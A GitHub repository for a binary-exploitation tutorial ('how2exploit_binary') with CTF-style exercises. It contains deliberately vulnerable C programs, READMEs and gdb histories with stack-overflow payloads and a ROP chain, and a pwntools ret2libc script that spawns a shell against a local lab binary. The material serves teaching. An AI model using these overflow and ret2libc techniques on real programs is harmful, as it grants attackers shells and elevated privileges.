├── intro-2
    ├── overflow1
    ├── overflow1.c
    └── README.md
├── exercise-1
    ├── overflow2
    ├── overflow2.c
    └── README.md
├── exercise-2
    ├── overflow
    ├── overflow.c
    └── README.md
├── exercise-3
    ├── overflow
    ├── overflow.c
    ├── .gdb_history
    └── README.md
├── exercise-4
    ├── libc.so.6
    ├── exercise-4
    ├── exercise-4.c
    ├── .gdb_history
    ├── soln_exercise-4.py
    └── README.md
├── intro-1
    ├── hello_world.bin
    ├── hello_world.c
    └── README.md
├── install.sh
├── exercise-3.5
    └── README.md
├── README.md
└── terms
    └── README.md


/intro-2/overflow1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/intro-2/overflow1


--------------------------------------------------------------------------------
/exercise-1/overflow2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-1/overflow2


--------------------------------------------------------------------------------
/exercise-2/overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-2/overflow


--------------------------------------------------------------------------------
/exercise-3/overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-3/overflow


--------------------------------------------------------------------------------
/exercise-4/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-4/libc.so.6


--------------------------------------------------------------------------------
/exercise-4/exercise-4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/exercise-4/exercise-4


--------------------------------------------------------------------------------
/intro-1/hello_world.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bretley/how2exploit_binary/HEAD/intro-1/hello_world.bin


--------------------------------------------------------------------------------
/intro-1/hello_world.c:
--------------------------------------------------------------------------------
1 | #include<stdio.h>
2 | 
3 | int main() {                        /* program entry point for the intro-1 example */
4 |     printf("Hello World!\n");       /* print the greeting followed by a newline */
5 | }
6 | 


--------------------------------------------------------------------------------
/exercise-4/exercise-4.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | 
 4 | int main() {                                                   /* exercise-4 target: print a message, then read stdin into a stack buffer */
 5 |     char msg[64] = "Joke's on you, there is no system!\n";
 6 |     char buf[64];
 7 |     write (1,&msg,strlen(msg));                                /* fd 1: emit the message bytes, without the NUL terminator */
 8 |     read(0,buf,256);                                           /* fd 0: requests up to 256 bytes into the 64-byte buf, so longer input writes past it */
 9 |     return 0;
10 |     }
11 | 


--------------------------------------------------------------------------------
/exercise-4/.gdb_history:
--------------------------------------------------------------------------------
 1 | file exercise-4
 2 | disas main
 3 | b*main+194
 4 | r < <(python -c 'print "A"*140 + "\x7d\x84\x04\x08" + "A"*148')
 5 | x /150wx $esp
 6 | x /150wx $esp-0x40
 7 | x /150wx $esp+0x40
 8 | x /150wx $esp-0x40
 9 | x /150wx $esp-0x100
10 | q
11 | p &bss
12 | p &__bss_start
13 | info file
14 | p &__bss_start
15 | q
16 | 


--------------------------------------------------------------------------------
/exercise-1/overflow2.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | 
 5 | /* This never gets called! */
 6 | void give_shell(){                  /* start an interactive shell; nothing in this file calls it */
 7 |     gid_t gid = getegid();          /* effective group ID of the running process */
 8 |     setresgid(gid, gid, gid);       /* set the real, effective and saved group IDs to that value */
 9 |     system("/bin/sh -i");           /* run /bin/sh in interactive mode */
10 | }
11 | 
12 | void vuln(char *input){             /* copy the caller's string into a 16-byte stack buffer */
13 |     char buf[16];
14 |     strcpy(buf, input);             /* no length check: an input of 16 or more characters writes past buf */
15 | }
16 | 
17 | int main(int argc, char **argv){    /* hand the first command-line argument, if any, to vuln() */
18 |     if (argc > 1)
19 |         vuln(argv[1]);
20 |     return 0;                       /* always returns 0, with or without an argument */
21 | }
22 | 


--------------------------------------------------------------------------------
/exercise-2/overflow.c:
--------------------------------------------------------------------------------
 1 | #include<stdio.h>
 2 | #include<stdlib.h>
 3 | #include<string.h>
 4 | 
 5 | int main(int argc, char **argv) {                              /* exercise-2 target: taunt the user, then copy argv[1] into a stack buffer */
 6 |     if (argc>1) {
 7 |         gid_t gid = getegid();                                 /* effective group ID of the running process */
 8 |         setresgid(gid, gid, gid);                              /* set the real, effective and saved group IDs to that value */
 9 |         printf("Good thing you don't have /bin/sh");           /* note: this literal contains the bytes "/bin/sh" */
10 |         printf("\nGood luck getting a shell.\n");
11 |         system("echo You Lose!\n");                            /* the only system() call in this file */
12 |         char buf[24];
13 |         strcpy(buf,argv[1]);                                   /* no length check: an argument of 24 or more characters writes past buf */
14 |         return 0;
15 |     }
16 |     else {
17 |         return 0;                                              /* no argument given: exit without doing anything */
18 |     }
19 | }
20 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | # Refresh the apt package index first
 2 | apt-get -y update;
 3 | 
 4 | # Basic programs that need to be installed
 5 | apt-get -y install gdb;
 6 | apt-get -y install gdbserver;
 7 | apt-get -y install git;
 8 | apt-get -y install python-dev;
 9 | apt-get -y install socat;
10 | apt-get -y install vim;
11 | apt-get -y install python-pip;
12 | apt-get -y install gcc-multilib;
13 | 
14 | pip install capstone;
15 | 
16 | # This shouldn't take 3 tries....
17 | pip install pwntools;
18 | pip install pwntools;
19 | pip install pwntools;
20 | # Clone PEDA into ~/peda so it matches the path sourced from ~/.gdbinit below
21 | git clone https://github.com/longld/peda.git ~/peda
22 | echo "source ~/peda/peda.py" >> ~/.gdbinit
23 | 


--------------------------------------------------------------------------------
/exercise-3/overflow.c:
--------------------------------------------------------------------------------
 1 | #include<stdio.h>
 2 | #include<string.h>
 3 | int main(int argc, char **argv) {                                          /* exercise-3 target: copy argv[1] into a stack buffer, then run /bin/date */
 4 |     putenv("PATH=");                                                       /* set PATH to the empty string in this process's environment */
 5 |     printf("I've broken up my system call!\n");
 6 |     printf("You think I've included what you need for this? You wish\n");
 7 |     char user_buf[64]= "";
 8 |     if (argc > 1) {
 9 |         strcpy(user_buf,argv[1]);                                          /* no length check: an argument of 64 or more characters writes past user_buf */
10 |     }
11 |     else {
12 |         printf("usage: ./overflow [input]\n");
13 |         return 0;
14 |         }
15 |     char buf1[10] = "/b";
16 |     char buf2[8] = "in/";
17 |     char buf3[5] = "date";
18 |     strcat(buf2,buf3);                                                     /* buf2 becomes "in/date": 7 chars + NUL exactly fills its 8 bytes */
19 |     strcat(buf1,buf2);                                                     /* buf1 becomes "/bin/date": 9 chars + NUL exactly fills its 10 bytes */
20 |     system(buf1);                                                          /* runs the assembled command string */
21 |     printf("Aren't these string functions wonderful?\n");
22 |     return 0;
23 | }
24 | 


--------------------------------------------------------------------------------
/intro-2/overflow1.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | #include <unistd.h>
 5 | #include <sys/types.h>
 6 | #include "dump_stack.h"
 7 | 
 8 | void vuln(int tmp, char* str)                        /* copy str into a 64-byte stack buffer, then spawn a shell only if win == 1 */
 9 | {
10 | 	int win = tmp;                                   /* main() passes 0 here */
11 | 	char buf[64];
12 | 	strcpy(buf, str);                                /* no length check: a str of 64 or more characters writes past buf */
13 | 	dump_stack((void**) buf, 23, (void**) &tmp);     /* declared in dump_stack.h (not shown); presumably prints the stack around buf -- confirm */
14 | 	printf("win = %d\n", win);
15 | 
16 | 	if (win == 1) {
17 | 		execl("/bin/sh", "sh", NULL);                /* replace this process with /bin/sh */
18 | 	} else {
19 | 		printf("Sorry, you lose.\n");
20 | 	}
21 | 
22 | 	exit(0);                                         /* terminates the process here, so vuln() never returns to main() */
23 | }
24 | 
25 | int main(int argc, char** argv)                      /* require exactly one argument and pass it to vuln() with tmp = 0 */
26 | {
27 | 	if (argc != 2) {
28 | 		printf("Usage: stack_overwrite [str]\n");
29 | 		return 1;                                    /* wrong argument count: print usage and fail */
30 | 	}
31 | 
32 | 	uid_t euid = geteuid();                          /* effective user ID of the running process */
33 | 	setresuid(euid, euid, euid);                     /* set the real, effective and saved user IDs to that value */
34 | 	vuln(0, argv[1]);
35 | 	return 0;
36 | }
37 | 


--------------------------------------------------------------------------------
/exercise-4/soln_exercise-4.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | context(arch='i386', os='linux') # <-- Add the architecture and os
 3 | binary = ELF("exercise-4")  # target binary, used for symbol lookups
 4 | libc = ELF("libc.so.6")  # libc shipped with the exercise, used for symbol offsets
 5 | 
 6 | write_plt = p32(binary.symbols["write"])  # packed 32-bit address of the binary's "write" symbol
 7 | read_GOT = p32(binary.symbols["got.read"])  # packed address of read's GOT entry
 8 | read_plt = p32(binary.symbols["read"])  # not used below
 9 | bss_addr = p32(binary.symbols["__bss_start"])  # not used below
10 | pop_ret = "\x9d\x85\x04\x08"  # hard-coded little-endian address 0x0804859d; presumably a pop...ret gadget in exercise-4 -- TODO confirm how many pops
11 | 
12 | 
13 | r=process("./exercise-4")  # run the target locally
14 | 
15 | """
16 | You can use these to test it as a server over localhost
17 | r=remote("127.0.0.1",1337)
18 | 
19 | 
20 | run this in a different terminal VVVV
21 | socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4"
22 | """
23 | r.recvline()  # consume the message line the target prints on start-up
24 | 
25 | exploit = "A"*140  # padding before the chain; .gdb_history uses the same 140-byte offset
26 | exploit += write_plt +pop_ret +  p32(1)+ read_GOT + p32(4) 
27 | exploit += p32(binary.symbols["main"])  # address of main appended as the last word of stage 1
28 | 
29 | r.sendline(exploit)
30 | addr_read = int(r.recv(4)[::-1].encode("hex"),16)  # 4 received bytes, byte-reversed and parsed as an integer; str.encode("hex") is Python 2 only
31 | r.recvline()  # presumably the message printed again after re-entering main -- confirm
32 | libc_base = addr_read - libc.symbols["read"]  # leaked address minus read's offset in libc.so.6
33 | system = p32(libc_base + libc.symbols["system"])
34 | binsh = p32(libc_base +  libc.search("/bin/sh").next())  # first "/bin/sh" match in libc; .next() is Python 2 only
35 | r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148?
36 | r.interactive()  # hand the connection over to the user
37 | 


--------------------------------------------------------------------------------
/exercise-3/.gdb_history:
--------------------------------------------------------------------------------
 1 | fin sh
 2 | b*main
 3 | r
 4 | find sh
 5 | find sh binary
 6 | file overflow
 7 | cler
 8 | clear
 9 | dumprop binary
10 | ropsearch binary
11 | b*main
12 | r
13 | ropsearch binary
14 | ropsearch
15 | ropsearch ""
16 | ropsearch "pop"
17 | ropsearch ""
18 | ropsearch binary1
19 | q
20 | clear
21 | b*main
22 | r
23 | clear
24 | dumprop
25 | ropsearch "" 
26 | clear
27 | find /b
28 | p strcpy
29 | checksec
30 | q
31 | p bss
32 | info address __bss_start 
33 | q
34 | q
35 | find "/b" binary
36 | b*main
37 | r
38 | find "/b" binary
39 | find "in/" binary
40 | find "sh" binary
41 | ropsearch "" binary
42 | b*main
43 | r
44 | ropsearch "" binary
45 | ropsearch "" binary | grep pop
46 | ropsearch "" binary 
47 | set arg $(python -c 'print "A"*76 + "\x60\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x9e\x85\x04\x08" + "\x50\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x2c\xa0\x04\x08" + "\x29\x95\x04\x08"  + "\x50\x83\x04\x08" + "\x50\x83\x04\x08" + "\x2c\xa0\x04\x08" + "\x96\x86\x04\x08"+ "\x80\x83\x04\x08" + "JUNK" + "\x2c\xa0\x04\x08"')
48 | b*main
49 | r
50 | ni
51 | q
52 | file overflow
53 | find /b binary
54 | b*main 
55 | r
56 | find /b binary
57 | find in/ binary
58 | find sh binary
59 | q
60 | file overflow
61 | info addr __bss_start 
62 | zdq
63 | q
64 | q
65 | q
66 | clear
67 | ls
68 | clear
69 | q
70 | b*main
71 | r
72 | ropsearch "" binaru
73 | ropsearch "" binary
74 | clear
75 | clear
76 | ls
77 | find "/b" binary
78 | find "in/" binary
79 | find "sh" binary
80 | ropsearch "" binary
81 | dd
82 | q
83 | b*main
84 | r
85 | celar
86 | ls
87 | ropsearch "" binary
88 | q
89 | clear
90 | ls
91 | clear
92 | q
93 | 


--------------------------------------------------------------------------------
/exercise-3.5/README.md:
--------------------------------------------------------------------------------
 1 | # pwntools Overview
 2 | 
 3 | **Documentation: https://pwntools.readthedocs.io**
 4 | 
 5 | First things first:
 6 | 
 7 | ```python
 8 | from pwn import *
 9 | ```
10 | 
11 | That's just a generic import statement.
12 | 
13 | ```python
14 | context(arch='i386', os='linux')
15 | ```
16 | 
17 | This just sets the context for other functions that we'll describe later.
18 | 
19 | ```python
20 | binary = ELF("some_challenge")
21 | libc = ELF("some_libc")
22 | ```
23 | 
24 | This part adds two ELF objects, binary and libc. ELF objects are supremely useful -- they give you access to a wide array of methods and data fields. I almost always have both of these lines in my script, even if the libc one is commented out.
25 | 
26 | ```python
27 | r = process("./some_challenge")
28 | ```
29 | 
30 | This simply executes the challenge (in the same directory.)
31 | 
32 | Alternatively:
33 | 
34 | ```python
35 | r = remote("127.0.0.1",1337) #<-- Replace with actual HOST,PORT
36 | ```
37 | 
38 | will run it remotely (many CTFs will not give you a full shell, just a host and
39 | a port to connect to the binary.)
40 | 
41 | Many of you will remember taking addresses and turning them into python
42 | escape sequences by hand.
43 | 
44 | If the address of the `write()` function is `0xdeadbeef`, the escaped address for `write()` would be `\xef\xbe\xad\xde`.
45 | 
46 | `pwntools` can take care of this for us!
47 | 
48 | ```python
49 | write = p32(binary.symbols["write"])
50 | ```
51 | 
52 | This "packs" (converts to the escape sequence, sort of) the address of `write()` for us on a 32 bit machine. `p64()` also exists, for 64 bit machines. Another thing to be cognizant of is the difference between Big and Little Endian memory encoding. Make sure you know what format the system you're writing an exploit for is using.
53 | 
54 | Assuming `r` is an instantiated process or remote, you can now use these methods to communicate with the binary.
55 | 
56 | ```python
57 | r.sendline("This sends a string with a newline appended to the end")
58 | r.send("This also sends a string")
59 | ```
60 | 
61 | Reading this information is one thing. Getting real experience is another.
62 | **At this point I would strongly recommend solving the first 3 challenges using pwntools.**
63 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # how2exploit_binary: get your hack on.
 2 | 
 3 | ### A note from the creator
 4 | 
 5 | Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been
 6 | looking for a place to start learning binary exploitation, then you're in luck.
 7 | This tutorial is intended for anyone with experience in coding, ideally C or
 8 | C++, but I only knew Python when I started.
 9 | 
10 | Written by someone who is just barely better than "incompetent," I'll be
11 | explaining how I learned my skills. These tutorials will be a bit long winded,
12 | but hopefully they will be informative and entertaining. Please feel free to
13 | contact me about any clarifications that should be included in the tutorials.
14 | 
15 | **This is intended for Linux. It's free if you don't already have it. Don't
16 | want to dual boot? Get a VM.**
17 | 
18 | -Best of luck
19 | 
20 | [Bretley](https://github.com/Bretley)
21 | 
22 | ## The Grand Glossary of Terms
23 | 
24 | I've compiled this list of as many useful things as I could find. It contains
25 | all sorts of goodies that I wish I had found or had explained to me earlier. If
26 | you have a question, it can probably be answered in here. Otherwise, get your
27 | Google-Fu on
28 | 
29 | * [The Glossary](terms)
30 | 
31 | ## External Tools.
32 | 
33 | I strongly recommend you install and use the following tools to make your life
34 | a bit easier:
35 | 
36 | * [longld/peda](https://github.com/longld/peda/): I use this tool in all of
37 |   these tutorials. It provides a wide range of useful functions and makes `gdb`
38 |   far more user friendly. Just follow the installation instructions in the repo.
39 | 
40 | * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an
41 |   exploit framework built in my favorite language, python. It has a whole slew
42 |   of useful functions and chicanery that makes the exploit process more fun and
43 |   less painful. Install with: `$ sudo pip install pwntools`
44 | 
45 | ## Introductory Tutorials:
46 | 
47 | * [Setup Script](./install.sh)
48 | * [Intro 1: What is a binary, really?](intro-1)
49 |     * [Companion Video](https://youtu.be/6cNbKnxbAWw)
50 |     * [Areece x86 Calling Conventions](http://codearcana.com/posts/2013/05/21/a-brief-introduction-to-x86-calling-conventions.html)
51 | * [Intro 2: Screwing around with the stack](intro-2)
52 | 
53 | ## Buffer Overflows and ROP:
54 | 
55 | * [1:   The power of SEGFAULT](exercise-1)
56 | * [2:   Build your own `system()`](exercise-2)
57 | * [3:   Follow the Yellow Brick Functions](exercise-3)
58 | * [3.5: Learning pwntools](exercise-3.5)
59 | * [4:   Pay a Visit to Your Local Library](exercise-4)
60 | 
61 | ## Heap Exploitation:
62 | 
63 | * More to come here soon ;)
64 | 


--------------------------------------------------------------------------------
/terms/README.md:
--------------------------------------------------------------------------------
 1 | # Glossary of Terms
 2 | 
 3 | Note: If you have a term you'd like added to the list, add an Issue or open a Pull Request.
 4 | 
 5 | ## Technical Terms
 6 | 
 7 | * **ASLR (Address Space Layout Randomization):** Security measure in modern OSes to randomize stack and libc addresses on each program execution.
 8 | 
 9 | * **Binary:** A binary is the output file from compiling a C or C++ file. Anything in the
10 | binary has a *constant address* (usually... see PIE.)
11 | 
12 | * **Canary:** A canary is some (usually random) value that is used to verify that
13 | nothing has been overwritten. Programs may place canaries in memory, and
14 | check that they still have the exact same value after running potentially
15 | dangerous code, verifying the integrity of that memory.
16 | 
17 | * **GOT (Global Offset Table):** The GOT is a table of addresses stored in the data section of memory. Executed programs use it to look up the runtime addresses of global variables that are unknown at compile time.
18 | 
19 | * **Heap:** The heap is a far more reliable memory space similar to the stack.
20 | However, usage of the heap has to be invoked by the coder, so heap problems are
21 | often their own category of exploitation
22 | 
23 | * **libc:** The C standard library. When a binary is *dynamically linked*, it
24 | loads a libc file at run time. This means that the whole set of standard
25 | library functions is located somewhere in the memory used by the program.
26 | 
27 | * **NX (Non-Executable):** Security measure in modern OSes to separate processor instructions (code) and data (everything that's not code.) This prevents memory from being both executable and writable.
28 | 
29 | * **PIE (Position Independent Executable):** Essentially ASLR, but for the binary itself.
30 | When this protection is enabled, locations of actual code in the binary are randomized.
31 | 
32 | * **PLT (Procedure Linkage Table):** The PLT is essentially a wrapper function for all
33 | functions directly called in the binary. *Only used in dynamically
34 | linked binaries*.
35 | 
36 | * **ROP (Return Oriented Programming):** Reusing tiny bits of code throughout the binary to construct commands we want to execute.
37 | 
38 | * **Stack:** The stack is part of the memory for a binary. Local variables and
39 | pointers are often stored here. The stack can be randomized.
40 | 
41 | 
42 | ## Important Functions to Watch Out For:
43 | 
44 | TODO: ADD MORE.
45 | 
46 | * `mprotect()`: This is the function responsible for setting page privileges. If
47 | you can call this function with your own arbitrary arguments, you can
48 | effectively bypass NX protection.
49 | 
50 | * `system()`: This function can be used to execute commands or even other
51 | binaries if called properly. I think it defaults to sh to handle commands on
52 | most Linux flavors.
53 | 
54 | ## General Terms
55 | 
56 | * **Arbitrary:** This word is used to imply the fullness of control that you
57 | might have given an exploit. If you've achieved *arbitrary code execution*, that means you can run, read, or write whatever commands you choose.
58 | 
59 | * **Reliable:** Reliable in the context of binary exploitation is almost exactly
60 | the same as regular use. An exploit is said to be reliable if it works across
61 | different runs consistently. It might seem dumb to define this word, but
62 | sometimes with exploits you will only have the option to make an unreliable
63 | exploit.
64 | 


--------------------------------------------------------------------------------
/intro-1/README.md:
--------------------------------------------------------------------------------
 1 | # Intro 1: What is a binary, really?
 2 | 
 3 | In short, a binary is the output file that the computer can actually run when you compile high level code, such as C or C++. I believe in hands on learning, so we can take a look inside one to really find out.
 4 | 
 5 | Consider the file [hello_world.c](hello_world.c):
 6 | ```C
 7 | # include<stdio.h>
 8 | int main() {
 9 |     printf("Hello World!\n");
10 | }
11 | ```
12 | 
13 | This is your average C file, more or less. It's got a main function, some includes, and a little bit of code to be run. However, your computer can't actually run it. In order to make it usable, we must compile it:
14 | 
15 | ```shell
16 | $ gcc -m32 hello_world.c -o hello_world.bin
17 | ```
18 | 
19 | You can ignore the `-m32` argument (we'll talk about it later), but the `-o hello_world.bin` simply specifies what the name of the output file is going to be.
20 | 
21 | From here, we can execute it:
22 | 
23 | ```shell
24 | $ ./hello_world.bin
25 | Hello World!
26 | ```
27 | 
28 | Unsurprisingly, we get `"Hello World!"` as output. But let's go a bit deeper. We can open `gdb (GNU Debugger)` and see what's happening under the hood:
29 | 
30 | ```gdb
31 | $ gdb -q ./hello_world.bin
32 | Reading symbols from ./hello_world.bin...(no debugging symbols found)...done.
33 | gdb-peda$ disas main
34 | Dump of assembler code for function main:
35 |    0x0804841d <+0>:     push   %ebp
36 |    0x0804841e <+1>:     mov    %esp,%ebp
37 |    0x08048420 <+3>:     and    $0xfffffff0,%esp
38 |    0x08048423 <+6>:     sub    $0x10,%esp
39 |    0x08048426 <+9>:     movl   $0x80484d0,(%esp)
40 |    0x0804842d <+16>:    call   0x80482f0 <puts@plt>
41 |    0x08048432 <+21>:    leave
42 |    0x08048433 <+22>:    ret
43 | End of assembler dump.
44 | gdb-peda$ quit
45 | ```
46 | 
47 | Your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. Don't worry about this, my gdb is modified.
48 | 
49 | The weird code that `gdb` displayed is called assembly language. It's the lowest level human readable code out there. Each line maps directly to a machine instruction. Let's break this down.
50 | 
51 | ```asm
52 | 0x0804841d <+0>:     push   %ebp
53 | 0x0804841e <+1>:     mov    %esp,%ebp
54 | 0x08048420 <+3>:     and    $0xfffffff0,%esp
55 | 0x08048423 <+6>:     sub    $0x10,%esp
56 | ```
57 | 
58 | The hex numbers you see on the left are addresses. You can think of these just like your house address: `0x0804841d` is where the instruction `push   %ebp` lives. These first four instructions are just conventions for a function, in this case `main()`.
59 | 
60 | ```asm
61 | 0x08048426 <+9>:     movl   $0x80484d0,(%esp)
62 | 0x0804842d <+16>:    call   0x80482f0 <puts@plt>
63 | ```
64 | 
65 | These instructions are what actually print out `"Hello World!"`. The program moves the address of the string `"Hello World!"` into the memory address that `%esp` points to. `%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out whatever is at the address we supplied.
66 | 
67 | ```asm
68 | 0x08048432 <+21>:    leave
69 | 0x08048433 <+22>:    ret
70 | ```
71 | 
72 | The last two instructions return control from our `main()` function back to the C library, which then does some clean up and exits the program. We'll be learning more about how these binaries function in later tutorials.
73 | 


--------------------------------------------------------------------------------
/exercise-1/README.md:
--------------------------------------------------------------------------------
 1 | # The power of SEGFAULT
 2 | 
 3 | **Credit to [PicoCTF 2013](https://2013.picoctf.com) for the problem**
 4 | 
 5 | Consider our file for this exercise [overflow2.c](overflow2.c):
 6 | 
 7 | ```C
 8 | #include <stdio.h>
 9 | #include <stdlib.h>
10 | #include <string.h>
11 | 
12 | /* This never gets called! */
13 | void give_shell(){
14 |     gid_t gid = getegid();
15 |     setresgid(gid, gid, gid);
16 |     system("/bin/sh -i");
17 | }
18 | 
19 | void vuln(char *input){
20 |     char buf[16];
21 |     strcpy(buf, input);
22 | }
23 | 
24 | int main(int argc, char **argv){
25 |     if (argc > 1)
26 |         vuln(argv[1]);
27 |     return 0;
28 | }
29 | ```
30 | 
31 | Looking at the code for this program, you'll see the function `strcpy()` is called with our argument as a parameter. Since there are no size checks on our input, we can try to manipulate the stack just like before. You'll notice that there is no way `give_shell()` gets called. Not yet at least ;)
32 | 
33 | ```
34 | $ ./overflow2 $(python -c 'print "A"*24')
35 | Segmentation fault (core dumped)
36 | ```
37 | 
38 | Segmentation fault? What's this? Simply put, a segmentation fault means that the program tried to access a memory address it isn't allowed to use (often one that isn't mapped at all). Let's use `strace` to see what's really happening.
39 | 
40 | ```
41 | $ strace ./overflow2 $(python -c 'print "A"*32')
42 | ...
43 | ...
44 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
45 | ```
46 | 
47 | The address in question is `0x41414141`, or four "A"s. What does this mean? Consider the disassembly of the function `vuln()`, as well as `main()` where it's called.
48 | 
49 | ```
50 | $ gdb -q ./overflow2
51 | Reading symbols from ./overflow2...(no debugging symbols found)...done.
52 | gdb-peda$ disas main
53 | ...
54 |    0x08048516 <+26>:   call   0x80484e2 <vuln>
55 |    0x0804851b <+31>:    mov    $0x0,%eax
56 | ...
57 | gdb-peda$ disas vuln
58 | Dump of assembler code for function vuln:
59 |    0x080484e2 <+0>: push   %ebp
60 |    0x080484e3 <+1>: mov    %esp,%ebp
61 |    0x080484e5 <+3>: sub    $0x28,%esp
62 |    0x080484e8 <+6>: mov    0x8(%ebp),%eax
63 |    0x080484eb <+9>: mov    %eax,0x4(%esp)
64 |    0x080484ef <+13>:    lea    -0x18(%ebp),%eax
65 |    0x080484f2 <+16>:    mov    %eax,(%esp)
66 |    0x080484f5 <+19>:    call   0x8048360 <strcpy@plt>
67 |    0x080484fa <+24>:    leave
68 |    0x080484fb <+25>:    ret
69 | End of assembler dump.
70 | ```
71 | 
72 | You might remember from [Intro 2](../intro-2) that you can overwrite values on the stack with a `strcpy()` vulnerability. In the lines of `main()`, control is passed to the function `vuln()`. However, `vuln()` needs to know where to return to in `main()` when it finishes. This is called a return address. In this case, `vuln()` should jump back to `0x0804851b`, the instruction right after `main()` calls `vuln()`. When we get a SEGFAULT that we control, that means that we've overwritten the return address. What can we do with this? The possibilities are pretty much endless. You have control over the code's flow, so maybe we can call some other function, namely `give_shell()`.
73 | 
74 | ```
75 | $ objdump -d overflow2 | grep give_shell
76 | 080484ad <give_shell>:
77 | ```
78 | 
79 | Now that we have the address of a useful function, let's see if we can supply *our own* return address. First, as you may remember from the last tutorial, some of these characters aren't printable. We'll need to convert it to an escape sequence and reverse the order, leaving us with this: `"\xad\x84\x04\x08"`. Now we can substitute it in!
80 | 
81 | ```
82 | $ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"')
83 | $ ls
84 | overflow2  overflow2.c  README.md
85 | ```
86 | 
87 | We now have a shell!
88 | 


--------------------------------------------------------------------------------
/exercise-2/README.md:
--------------------------------------------------------------------------------
 1 | # Build your own `system()`
 2 | 
 3 | Well, life is tough. Unlike in the first overflow exercise, there's no included function that you can call to get a shell. But let's try and get a shell anyways.
 4 | 
 5 | ```C
 6 | # include<stdio.h>
 7 | # include<stdlib.h>
 8 | # include<string.h>
 9 | 
10 | int main(int argc, char **argv) {
11 |     if (argc>1) {
12 |         gid_t gid = getegid();
13 |         setresgid(gid, gid, gid);
14 |         printf("Good thing you don't have /bin/sh");
15 |         printf("\nGood luck getting a shell.\n");
16 |         system("echo You Lose!\n");
17 |         char buf[24];
18 |         strcpy(buf,argv[1]);
19 |     }
20 |     return 0;
21 | }
22 | ```
23 | 
24 | Now unlike the last problem, you might notice that there is no call to `system("/bin/sh")`. This means we're going to have to be a bit more clever.
25 | 
26 | Let's take a look at the disassembly to learn a bit more about `system()`
27 | 
28 | ```gdb
29 | $ gdb -q ./overflow
30 | Reading symbols from ./overflow...(no debugging symbols found)...done.
31 | gdb-peda$ disas main
32 | Dump of assembler code for function main:
33 | ...
34 |    0x0804853c <+47>:   call   0x8048400 <setresgid@plt>
35 |    0x08048541 <+52>:    movl   $0x8048620,(%esp)
36 |    0x08048548 <+59>:    call   0x8048390 <printf@plt>
37 |    0x0804854d <+64>:    movl   $0x8048642,(%esp)
38 |    0x08048554 <+71>:    call   0x80483c0 <puts@plt>
39 |    0x08048559 <+76>:    movl   $0x804865e,(%esp)
40 |    0x08048560 <+83>:    call   0x80483d0 <system@plt>
41 | ```
42 | 
43 | Now what is `system@plt`? This is a crucial part. This binary is dynamically linked. This means that the binary makes calls to an actual libc file that gets put into memory. Luckily for us, dynamically linked binaries have PLT stubs. Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. The PLT is a wrapper function for the actual code in libc. **The PLT is a part of the binary, its address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going to do this? Since the PLT is a part of the binary, we'll use `objdump`.
44 | 
45 | ```objdump
46 | $ objdump -d overflow | grep system
47 | 080483d0 <system@plt>:
48 |  8048560:   e8 6b fe ff ff          call   80483d0 <system@plt>
49 | ```
50 | 
51 | Now let's try to break the binary.
52 | 
53 | ```salt
54 | $ strace ./overflow $(python -c 'print "A"*44')
55 | ...
56 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
57 | ```
58 | 
59 | We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer register. This is the same as overwriting a return address. It simply means that we have control over the control flow. Now let's supply our address.
60 | 
61 | ```shell
62 | ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"')
63 | Good thing you don't have /bin/sh
64 | Good luck getting a shell.
65 | You Lose!
66 | sh: 1: ������: not found
67 | Segmentation fault (core dumped)
68 | ```
69 | 
70 | Now this is really weird. What happened here is that we called `system()`. We didn't provide any arguments for `system()` so it just pulled some junk from the stack. Calling a function in an exploit has to take this form:
71 | 
72 | \[address of function\] \[return address\] \[argument\]
73 | 
74 | Now when the programmer wrote this, (I wrote this one :P) he thought he could be smart and make fun of you for not having a `"/bin/sh"` string. However, he didn't realize that by including that string in the code, the string is in the binary. We can use `gdb` to find the string!
75 | 
76 | ```gdb
77 | $ gdb -q ./overflow
78 | Reading symbols from overflow...(no debugging symbols found)...done.
79 | gdb-peda$ b*main
80 | Breakpoint 1 at 0x804850d
81 | gdb-peda$ r
82 | Breakpoint 1, 0x0804850d in main ()
83 | gdb-peda$ find /bin/sh
84 | Searching for '/bin/sh' in: None ranges
85 | Found 3 results, display max 3 items:
86 | overflow : 0x804863a ("/bin/sh")
87 | overflow : 0x804963a ("/bin/sh")
88 |     libc : 0xf7f82a24 ("/bin/sh")
89 | ```
90 | 
